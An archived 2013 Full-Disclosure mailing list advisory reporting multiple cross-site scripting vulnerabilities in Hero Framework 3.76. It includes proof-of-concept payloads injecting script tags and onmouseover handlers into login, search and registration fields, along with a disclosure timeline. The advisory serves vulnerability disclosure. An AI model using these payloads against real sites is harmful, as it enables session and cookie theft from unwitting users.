| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <50EF0D2F.2010406@t-online.de> Date: Thu, 10 Jan 2013 19:49:19 +0100 From: Stefan Schurtz <sschurtz@...nline.de> To: full-disclosure@...ts.grok.org.uk Subject: Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory: Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities Advisory ID: SSCHADV2012-023 Author: Stefan Schurtz Affected Software: Successfully tested on Hero Framework 3.76 Vendor URL: http://www.heroframework.com/ Vendor Status: informed =========================== Vulnerability Description =========================== Hero Framework 3.76 is prone to multiple Cross-Site Scripting vulnerabilities ====================== PoC-Exploit ====================== http://[target]/hero_os/users/login?errors=true&username='"></style></script><script>alert(document.cookie)</script> http://[target]/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d" http://[target]/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d" // POST-Parameter Username: '"><script>alert(document.cookie)</script> First Name: '"><script>alert(document.cookie)</script> Last Name: '"><script>alert(document.cookie)</script> ====================== Solution ====================== - - ====================== Disclosure Timeline ====================== 16-Dec-2012 - informed via contact form 16-Dec-2012 - feedback from vendor ====================== Credits ====================== Vulnerabilities found and advisory written by Stefan Schurtz. ====================== References ====================== http://www.darksecurity.de/advisories/2012/SSCHADV2012-023.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (MingW32) Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools Comment: Download at: http://thunderbird.gnupt.de iEYEARECAAYFAlDvDSwACgkQg3svV2LcbMBDvQCeOwalzm6ixV0mwEARVAj5CpU8 nmcAn25XSY+IieYYbN4tn37O9jd2+LcC =n4gk -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists